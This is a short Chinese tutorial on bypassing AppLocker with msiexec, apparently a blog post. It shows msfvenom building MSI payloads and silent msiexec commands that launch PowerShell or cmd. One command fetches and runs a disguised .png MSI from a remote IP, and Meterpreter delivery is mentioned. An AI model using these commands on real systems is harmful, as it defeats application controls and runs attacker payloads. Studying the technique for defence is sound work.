绕过AppLocker系列之MSIEXEC的利用
可以使用Metasploit 的MsfVenom来生成用于执行命令或有效载荷的.MSI文件。
msfvenom -f msi -p windows/exec CMD=powershell.exe > powershell.msi
No platform was selected, choosing Msf::Module::Platform::Windows from the payload
No Arch selected, selecting Arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 199 bytes
Final size of msi file: 159744 bytes
使用 MsfVenom 生成 MSI 文件
运行powershell.msi 将会打开一个PowerShell会话,这样就可以绕过AppLocker的规则了,即使已经设置了所有用户都不可以执行PowerShell。
利用MSIEXEC 运行 PowerShell
同样可以利用这种方式运行cmd命令,即使Windows系统已经阻止了cmd命令的执行。
msiexec /quiet /i cmd.msi
执行上述命令后,就会弹出cmd的窗口。
另外,msiexec实用程序还可以运行已经重命名过的MSI文件,比如重命名为PNG的MSI文件。 这些文件可以在命令提示符中本地执行或从远程执行,当然也可以绕过AppLocker规则执行。
msiexec /q /i http://192.168.100.3/tmp/cmd.png
利用MSIEXEC执行PNG文件,弹出cmd
上述操作同样可以用在Meterpreter payload 执行MSI文件上。
利用MSI 执行 Meterpreter Payload
利用MSIEXEC获得Meterpreter 会话
绕过AppLocker系列之MSIEXEC的利用相关推荐
- 绕过AppLocker系列之MSBuild的利用
本文讲的是绕过AppLocker系列之MSBuild的利用,Microsoft已经在.NET框架中发布了许多可以编译和执行代码的二进制文件.最初引入了MSBuild,以便开发人员在不安装Visual ...
- 如何利用msxsl绕过AppLocker?
本文讲的是如何利用msxsl绕过AppLocker?, 0x00 前言 Casey Smith@subTee在twitter分享的一个技巧,使用包含微软签名的msxsl.exe能够执行JScript代 ...
- keras系列︱迁移学习:利用InceptionV3进行fine-tuning及预测、完美案例(五)
之前在博客<keras系列︱图像多分类训练与利用bottleneck features进行微调(三)>一直在倒腾VGG16的fine-tuning,然后因为其中的Flatten层一直没有真 ...
- ROS系统MoveIt玩转双臂机器人系列(三)--利用controller控制实际机器人
ROS系统MoveIt玩转双臂机器人系列(三)--利用controller控制实际机器人 注:本篇博文全部源码下载地址为:Git Repo. 1. 下载到本地后解压到当前文件夹然后运行:catkin_ ...
- 统计系列(四)利用Python进行假设检验
统计系列(四)利用Python进行假设检验 z检验 主要应用场景:在大样本量的总体比例检验 核心:两样本的总体比例差异 单样本比例检验 # 检验样本合格率与0.38是否有差异 import numpy ...
- 统计系列(三)利用Python进行参数估计
统计系列(三)利用Python进行参数估计 点估计 样本均值估计为总体均值,样本比例估计为总体比例. import numpy as npx = [1, 1, 0, 1, 0, 0, 1, 0, 1, ...
- 风险管理系列课程二:利用图技术优化反洗钱解决方案
风险管理系列课程 随着相互关联的全球金融市场在规模和复杂性上快速增加,风险评估和监控所面临的挑战变得日益艰巨.一些复杂的金融工具数量激增,如信用违约互换和抵押担保证券,而且一旦出错,就会付出数以万亿的 ...
- 【Linux_Fedora_应用系列】_3_如何利用Smplayer播放WMV格式的文件
在上一篇我们成功安装了视频播放器,并且成功安装里解码器[Linux_Fedora_应用系列]_2_如何安装视频播放器和视频文件解码 安装完的Smplayer的GUI的界面程序,可以播放FLV.AVI. ...
- VARCHART XGantt系列教程:如何利用颜色来丰富甘特图智能
VARCHART XGantt是一款功能强大的甘特图控件.其模块化的设计让您可以创建满足您和您的客户所需求的应用程序(我们领先的甘特图控件VARCHART XGantt可用于DotNET,Active ...
- python微信爬取教程_PYTHON爬虫之旅系列教程之【利用Python开发微信公众平台一】...
感谢大家的等待,好啦,都准备好瓜子.板凳,老司机要发车啦-- 本系列课程讲述"PYTHON爬虫之旅",具体大纲可参考:[PYTHON爬虫之旅]概要目录. 本节课讲述如何利用Pyth ...
最新文章
- java三角形创建子类_如何创建子类,以便参数属于Java中的子类类型
- 监控组件_分布式监控组件Cat,如何实现万亿级消息的高效存储?
- asp前端日历_asp显示日历效果
- c primer plus 第6版 中文版pdf_一种2-C聚酯修补填充剂
- PAT_B_1086_Java(15分)
- Linux C语言调用C++动态链接库
- 牛客网 【每日一题】5月28日题目精讲 Protecting the Flowers
- 七日掌握设计配色基础_掌握正确的基础知识:如何设计网站的导航,搜索和首页...
- mysql主从备份及原理分析
- 使用VSCODE开发UE4
- 【Spring 工厂】反转控制与依赖注入、Spring工厂创建复杂对象3种方式
- Android--Activity中使用Intent传值
- 为什么一般都使用 List list = new ArrayList() ,而不用 ArrayList alist = new ArrayList()呢?...
- linux缓冲设备,Linux设备驱动程序缓冲策略
- RK3288 开机时间和开机速度优化安卓系统优化
- Solidworks 3D Onshape 3D 繪圖自學分享
- 二维码和一维码生成器
- php+生成条形码18位,php实现在线生成条形码示例分享(条形码生成器)
- 用开源求解器和Pyomo实现灵活的班次安排
- 荣耀30pro系统_荣耀30pro和pro+的区别_荣耀30pro和pro+的区别对比详情 - 系统家园
热门文章
- 猜数游戏(人机交互)
- 阿里p9 Python工程师,进阶书籍推荐
- MIT CMS.300 Session 3 – DIGITAL ENVIRONMENTS GAMES 数字环境与游戏
- 【Numpy】1. n维数组,dtype,切片,索引
- 服务器常见的异常问题的解决方法
- 基于 Robot Framework 实现网络自动化测试
- R语言:rJava包的安装
- Linux重置root 密码
- Xcode No account for team . Add a new account in the Accounts preference pane or verify that your
- faker 无敌了,专注于制作假数据